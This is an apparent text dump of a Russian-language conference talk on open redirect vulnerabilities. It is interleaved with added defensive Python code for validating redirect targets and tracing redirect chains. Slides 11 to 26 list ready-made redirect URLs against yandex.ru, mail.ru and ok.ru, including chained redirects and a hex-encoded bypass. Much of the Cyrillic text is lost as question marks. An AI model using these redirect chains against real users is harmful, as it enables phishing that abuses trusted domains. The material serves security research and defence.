Title: Open Redirects
1 ?? ???? ????? ??????????
2 about me
- anonimous@localhost$ whoami
- BigBear
- anonimous@localhost$ id
- uid=1020(pentest) gid=100(antichat) groups=101(rdot)
- @i_BigBear
3 Open Redirects
- OWASP Description
- An open redirect is an application that takes a parameter and redirects a user to the parameter value without any validation.
- This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it.
4 Open Redirects
5 Open Redirects
6 Open Redirects
Client
Server 1
1.php?redir=http://server2
header("Location: http://server2/")
Server 2
7 Open Redirects
Client
Server 1
1.php?redir=http://anyhost
header("Location: http://anyhost/")
Server 2
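The two diagrams above (slides 6 and 7) show the same `1.php` handler sending whatever `redir` holds straight into the Location header. The following is an added example, not code from the talk, written in Python rather than the PHP of the slides: the verbatim pattern next to a checked version that resolves the parameter the way a browser would and only redirects to an exact-match allowlist. `APP_ORIGIN`, `ALLOWED_HOSTS` and the `.example.com` hostnames are assumptions standing in for "Server 1" and "Server 2".

```python
from urllib.parse import urljoin, urlsplit

# Assumed application origin and the hosts it is willing to send users to
# (placeholder names; the slides' "Server 1"/"Server 2" are unnamed).
APP_ORIGIN = "https://app.example.com/"
ALLOWED_HOSTS = {"app.example.com", "server2.example.com"}


def vulnerable_redirect_target(redir: str) -> str:
    """The pattern in the slides: the parameter value becomes the Location
    header unchanged, so ?redir=http://anyhost/ sends the user to anyhost."""
    return redir


def safe_redirect_target(redir: str, default: str = "/") -> str:
    """Return `redir` only if, after resolution against APP_ORIGIN, it points
    at an allowlisted host over http(s); otherwise return `default`.

    Assumes the framework has already percent-decoded the parameter once (as
    PHP's $_GET does). No further decoding is done on purpose: a value such as
    %2F%2Fanyhost then stays an odd path on our own host.
    """
    if not redir or not redir.strip():
        return default
    # Browsers treat backslashes as slashes in http(s) URLs, so normalise them
    # before parsing instead of letting "\\anyhost" through as a "path".
    candidate = redir.strip().replace("\\", "/")
    # Resolve relative ("/inbox") and scheme-relative ("//anyhost") values the
    # way the browser will, so the check sees the real destination.
    resolved = urljoin(APP_ORIGIN, candidate)
    parts = urlsplit(resolved)
    if parts.scheme not in ("http", "https"):
        return default                       # javascript:, data:, ...
    if parts.username is not None or parts.password is not None:
        return default                       # http://app.example.com@anyhost/
    if parts.hostname not in ALLOWED_HOSTS:
        return default                       # exact match, no suffix matching
    return resolved


if __name__ == "__main__":
    for value in ("/inbox", "http://server2.example.com/", "http://anyhost/",
                  "//anyhost/", "http://app.example.com@anyhost/",
                  "javascript:alert(1)"):
        print(f"{value!r:40} -> {safe_redirect_target(value)}")
```

Exact hostname matching matters: a suffix check would accept `app.example.com.anyhost`. Note that an allowlisted host is only as safe as its own redirect handling, which is exactly what the rest of the talk builds on.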
8 Open Redirects
9 Open Redirects
@Black2Fan
10 Open Redirects
Client
Server 1
1.php?redir=http://server2
header("Location: http://server2/")
Server 2
any host
header("Location: http://anyhost/")
11 Open Redirects
http://yandex.ru/clck/jsredir?from=yandex.ru%3Byandsearch%3Bweb%3B%3B&text=&etext=635.A3K9EhGzrzdN
http://yabs.yandex.ru/count/RhnEbYFY6Pm4000
http://awaps.yandex.net/1/c1/tx21lszVf7wve-k2Rifa_A_.swf?click_num=0
http://an.yandex.ru/count/asfa3573vsvsTTvssb9dYYe
12 Open Redirects
13 Open Redirects
https://mail.yandex.ru/?retpath=https://mail.yandex.ru/neo2/inbox
https://mail.yandex.ru/?retpath=https://google.com
14 Open Redirects
https://mail.yandex.ru/?retpath=https://an.yandex.ru/count/JcnAPGOmkJy40000Zh_yYqi5XPvP5vK1cm5kGxS298Yuvo_10OczVX8D0fYihxs-dWQThty64fQpheHU0Rhm6mcCwDvLyGMc6ugmgHN00Rs_yYMp0Qe1fQc4nmEyg9iX0v6rhcBQ1u
15 Open Redirects
Why ???
16 Open Redirects
https://auth.mail.ru/cgi-bin/auth?FakeAuthPage&Page=http://deti.mail.ru/
https://auth.mail.ru/cgi-bin/auth?FakeAuthPage&Page=http://google.com/
17 Open Redirects
?????????????? :-)
Step 1 ???? ?????????
Step 2 ???? ????????? ?? ???
18 Open Redirects
?????????????? :-)
http://ok.ru/dk?cmd=logExternal&st.cmd=logExternal&st.name=62670701063111&st.link=http://www.yandex.ru/
19 Open Redirects
?????????????? :-)
http://odnoklassniki.mail.ru
Step 3 ?????????
https://auth.mail.ru/cgi-bin/auth?FakeAuthPage&Page=http://odnoklassniki.mail.ru/
20 Open Redirects
?page=http://odnoklassniki%3Fmany-many-params
auth.mail.ru
Client
header("Location: http://odnoklassniki%3Fmany-many-params/")
Odnoklassniki.ru
any host
header("Location: http://anyhost/")
21 Open Redirects
https://auth.mail.ru/cgi-bin/auth?FakeAuthPage&Page=http://odnoklassniki.mail.ru/dk?cmd=logExternal&st.cmd=logExternal&st.name=62670701063111&st.link=http://www.yandex.ru/
22 Open Redirects
https://auth.mail.ru/cgi-bin/auth?FakeAuthPage&Page=http://odnoklassniki.mail.ru/dk?cmd=logExternal&st.cmd=logExternal&st.name=62670701063111&st.link=http://anyhost/
23 Open Redirects
24 Open Redirects
https://auth.mail.ru/cgi-bin/auth?FakeAuthPage&Page=http://odnoklassniki.mail.ru/dk?cmd=logExternal&st.cmd=logExternal&st.name=62670701063111&st.link=http://www.yandex.ru/
https://auth.mail.ru/cgi-bin/auth?FakeAuthPage&Page=http://odnoklassniki.mail.ru/dk?cmd=logExternal&st.cmd=logExternal&st.name=62670701063111&st.link=http://any.yandex.ru/
25 Open Redirects
https://auth.mail.ru/cgi-bin/auth?FakeAuthPage&Page=http://odnoklassniki.mail.ru/dk?cmd=logExternal&st.cmd=logExternal&st.name=62670701063111&st.link=http://an.yandex.ru/count/JcnAPGOmkJy40000Zh_yYqi5XPvP5vK1cm5kGxS298Yuvo_10OczVX8D0fYihxs-dWQThty64fQpheHU0Rhm6mcCwDvLyGMc6ugmgHN00Rs_yYMp0Qe1fQc4nmEyg9iX0v6rhcBQ1u--x8jD1v-uiY4R3fE539bYGeoGdoIWaDGmhv2V9AUEcQYmG5bp1wJ00000J0MkyUW8iyWCm0m5iB2-9f03iG6oYbEvhty64hl-rfaBeJVud071__________yFVnO0
26 Open Redirects
https://auth.mail.ru/cgi-bin/auth?FakeAuthPage&Page=http://odnoklassniki.mail.ru/dk?cmd=logExternal&st.cmd=logExternal&st.name=62670701063111&st.link=http://an.yandex.ru%2f%63%6f%75%6e%74%2f%4a%63%6e%41%50%47%4f%6d%6b%79%57%43%6d%30%6d%35%69%42%32%2d%39%66%30%33%69%47%36%6f%59%62%45%76%68%74%79%36%34%68%6c%2d%72%66%61%42%65%4a%56%75%64%30%37%31%5f%5f%5f%5f%5f%5f%5f%5f%5f%5f%79%46%56%6e%4f%30
27 Open Redirects
?????????????? :-)
Client
odnoklassniki.mail.ru
auth.mail.ru
ok.ru
an.yandex.ru
anyhost
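Slides 20 to 27 chain several redirectors, with the last hop on slide 26 hidden behind a percent-encoded path so that it survives any filter that looks for "http://" in the parameter. From the defender's side (mail gateway, link scanner, log review) the useful question is where such a link finally ends up. The following is an added example, not code from the talk: it walks every URL-valued query parameter, decodes nested percent-encoding until it stops changing, and reports the hosts in the order a browser would reach them. The sample links are constructed to mirror the slides' chain shape with placeholder hosts (`auth.corp.example`, `social.corp.example`, `ads.example`, `anyhost.example`), not the real ones.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Absolute or scheme-relative URL once a parameter value has been decoded.
URL_VALUE = re.compile(r"^\s*(?:https?:)?//", re.IGNORECASE)


def fully_decode(value: str, max_rounds: int = 5) -> str:
    """Percent-decode until the string stops changing (bounded).

    Covers double-encoded values and fully hex-encoded paths such as
    %2f%63%6f%75%6e%74%2f, which decodes to "/count/".
    """
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def redirect_chain(url: str, max_depth: int = 8) -> list:
    """Hosts a browser would pass through if every URL-valued query parameter
    along the way is honoured as a redirect target, starting with `url`'s own
    host. Depth-first and bounded, so a self-referencing link cannot loop."""
    hosts = []

    def walk(current: str, depth: int) -> None:
        # Backslashes behave like slashes in http(s) URLs; normalise first.
        parts = urlsplit(current.replace("\\", "/"))
        if parts.hostname:
            hosts.append(parts.hostname)
        if depth >= max_depth:
            return
        # parse_qsl decodes each value once; fully_decode handles deeper layers.
        for _name, raw in parse_qsl(parts.query, keep_blank_values=True):
            value = fully_decode(raw)
            if URL_VALUE.match(value):
                walk(value.strip(), depth + 1)

    walk(url, 0)
    return hosts


def ends_off_domain(url: str, trusted_suffix: str) -> bool:
    """True when a link that starts on a trusted host would land elsewhere."""
    hosts = redirect_chain(url)
    if not hosts:
        return False

    def trusted(host: str) -> bool:
        return host == trusted_suffix or host.endswith("." + trusted_suffix)

    return trusted(hosts[0]) and not trusted(hosts[-1])


# Constructed samples (placeholder hosts), modelled on the slides' chain.
# Flat form: the inner redirector's parameters ride along unencoded.
FLAT_CHAIN = (
    "https://auth.corp.example/cgi-bin/auth?Page=http://social.corp.example/dk"
    "?cmd=logExternal&st.link=http://ads.example/count/abc"
)
# Nested form: each hop is encoded one level deeper than the previous one.
NESTED_CHAIN = (
    "https://auth.corp.example/cgi-bin/auth?Page="
    "http%3A%2F%2Fsocial.corp.example%2Fdk%3Fcmd%3DlogExternal%26st.link%3D"
    "http%253A%252F%252Fads.example%252Fcount%252Fabc%253Fto%253D"
    "http%25253A%25252F%25252Fanyhost.example%25252F"
)
# Hex-encoded path, as on slide 26: "/count/abc" written as %2f%63%6f...
HEX_PATH_CHAIN = (
    "https://auth.corp.example/cgi-bin/auth?Page=http://social.corp.example/dk"
    "?cmd=logExternal&st.link=http://ads.example%2f%63%6f%75%6e%74%2f%61%62%63"
)

if __name__ == "__main__":
    for sample in (FLAT_CHAIN, NESTED_CHAIN, HEX_PATH_CHAIN):
        print(" -> ".join(redirect_chain(sample)),
              "| leaves corp.example:", ends_off_domain(sample, "corp.example"))
```

The walker decodes each value completely before parsing it, which is an approximation: a real chain decodes one layer per hop. For host extraction that difference does not matter, and it is what makes the slide 26 style of hex-encoded path visible to a filter that would otherwise see no "http://" in the value.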
28 ??????? ?? ???????? ! @i_BigBear